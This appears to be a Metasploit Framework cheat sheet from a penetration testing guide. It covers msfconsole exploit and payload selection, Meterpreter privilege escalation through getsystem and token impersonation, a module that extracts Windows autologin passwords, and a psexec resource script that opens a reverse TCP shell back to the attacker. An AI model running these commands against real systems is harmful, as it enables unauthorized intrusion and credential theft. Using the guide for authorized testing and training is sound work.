d4Rk's 1337 h4x0r guide
  • Introduction
  • Reconnaissance
    • Recon
    • OSINT
  • Enumeration
    • Network discovery
    • Port scanning
    • Webserver scanning
    • Exploit detection
    • Fuzzing
    • Process monitoring
  • Exploitation
    • Shells
      • Shells
      • TTY
    • Passwords
      • Hashcat
      • John the Ripper (JTR)
      • Hydra
      • Passwords & credentials
    • Web
      • SQL injection (SQLi)
      • Cross site scripting (XSS)
      • File inclusions (LFI, RFI)
      • Directory traversal
      • Cross site request forgery (CSRF)
      • XML external entity (XXE)
      • Cross origin resource sharing (CORS)
      • Server-side request forgery (SSRF)
      • Server-side template injection (SSTI)
      • Access control vulnerabilities
      • Authentication vulnerabilities
      • JWT attacks
      • File uploads
      • Host header attacks
      • Clickjacking
      • Logic flaws
      • OS command injection
      • HTTP Request smuggling
      • Insecure deserialization
      • DOM-based
      • WebSockets
      • Web cache poisoning
    • Buffer overflow
      • General
      • Linux
      • Windows
    • Misc
      • Evasion
      • SQSH
  • Privilege escalation
    • Linux
      • Overview
    • Windows
      • Overview
      • Mimikatz
      • PowerSploit
      • Juicy Potato, Rotten Potato (NG)
      • JAWS
      • Empire
      • SILENTTRINITY
  • Post exploitation
    • Loot
    • Pivoting
    • Standalone Tools
  • Services
    • TCP
      • TCP 21: FTP
      • TCP 22: SSH
      • TCP 23: Telnet
      • TCP 25, 587: SMTP
      • TCP 53: DNS
      • TCP 80, 443: HTTP(S)
      • TCP 88: Kerberos
      • TCP 110, 995: POP3(S)
      • TCP 111: rpcbind
      • TCP 135: MSRPC
      • TCP 139, 445: NetBIOS, SMB
      • TCP 143, 993: IMAP(S)
      • TCP 389, 636, 3268, 3269: LDAP
      • TCP 1433, UDP 1434: MSSQL Server
      • TCP 2049: NFS
      • TCP 3306: MySQL
      • TCP 3389: RDP
      • TCP 5985: WinRM
      • TCP 6379: Redis
      • TCP 27017: MongoDB
    • UDP
      • UDP 137, 138, TCP 139: NetBIOS
      • UDP 161: SNMP
    • Misc
      • Active Directoy
      • Apache Tomcat
      • Drupal
      • H2 Databases
      • IIS
      • IPsec
      • IRC
      • Java Applets
      • Java RMI
      • Jenkins
      • Joomla
      • Oracle
      • PHP
      • SharePoint
      • WordPress
  • File transfer
    • Overview
    • Wget
    • Pure-FTPd
    • TFTP
    • VBScript: Wget clone
  • Misc
    • Bash
    • Burp Suite
    • Crypto
    • Ebowla
    • Firefox extensions
    • Impacket
    • Memory forensics
    • Metasploit Framework (MSF)
    • MITM
    • Msfvenom
    • Pass the Hash (PTH)
    • PowerShell
    • PowerShell on Linux
    • Wireshark
    • Wordlists and dictionaries
  • Bug Bounty
    • Platforms
    • Tools
Powered by GitBook
On this page
  • Start
  • Exploits
  • Options
  • Payloads
  • Sessions
  • Meterpreter
  • Encoders
  • Misc
  • Multi/handler
  • Jobs
  • Post exploitation
  • Meterpreter session
  • Resource Scripts
  • demo.rc
Edit on GitHub
  1. Misc

Metasploit Framework (MSF)

The world’s most used penetration testing framework Metasploit

Start

Start db

msfdb start

or

systemctl start postgresql

Start metasploit framework console

msfconsole

Exploits

Select exploit

use <exploit>

Run exploit

run

or

exploit

Options

Show options

show options

Show advanced options

show advanced

Set option

set <option> <value>

Set option (global)

setg <option> <value>

Payloads

Show payloads

show payloads

Select payload

set payload <payload>

Sessions

Show sessions

sessions -h

Interact with session

sessions <number>

Send session to background

background

Meterpreter

The shell command will present you with a standard shell on the target system.

shell

Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.

getsystem

Encoders

Show encoders

show encoders

Select encoder

set encoder <encoder>

Misc

Search for exploits

search <term>

Go back

back

Display help

help

Get info about current context?

info
show auxiliary

Multi/handler

Just start listener

use exploit/multi/handler

Jobs

Start job in background

run -j

Show jobs

jobs

Post exploitation

This module suggests local meterpreter exploits that can be used.

use post/multi/recon/local_exploit_suggester

This module extracts the plain-text Windows user login password in Registry.

use post/windows/gather/credentials/windows_autologin

This module will login with the specified username/password and execute the supplied command as a hidden process.

use post/windows/manage/run_as

Meterpreter session

Upgrade shell to meterpreter shell

post/multi/manage/shell_to_meterpreter

Migrate to other (e.g. more stable) process

migrate

Get system info

sysinfo

Port forwarding

portfwd add -l <port> -r 127.0.0.1 -p <port>

Impersonation (Windows)

Look for privileges like SeImpersonatePrivilege, SeDebugPrivilege, etc.

whoami /priv

Load incognito module and list available tokens

load incognito
list_tokens -g

Impersonate e.g. BUILTIN\Administrators

impersonate_token "BUILTIN\Administrators"

Migrate to a process with the correct permission, to actually get the elevated permissions (token != permission).

ps 
migrate <pid>

Resource Scripts

Resource scripts provide an easy way for you to automate repetitive tasks in Metasploit.

msfconsole -r demo.rc

demo.rc

use exploit/windows/smb/psexec
set rhost <ip>
set smbuser Administrator
set smbpass <hash-or-password>
set smbdomain <domain>
set payload windows/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/smart_migrate
setg lport 443
setg lhost <own-ip>
PreviousMemory forensicsNextMITM

Last updated 3 years ago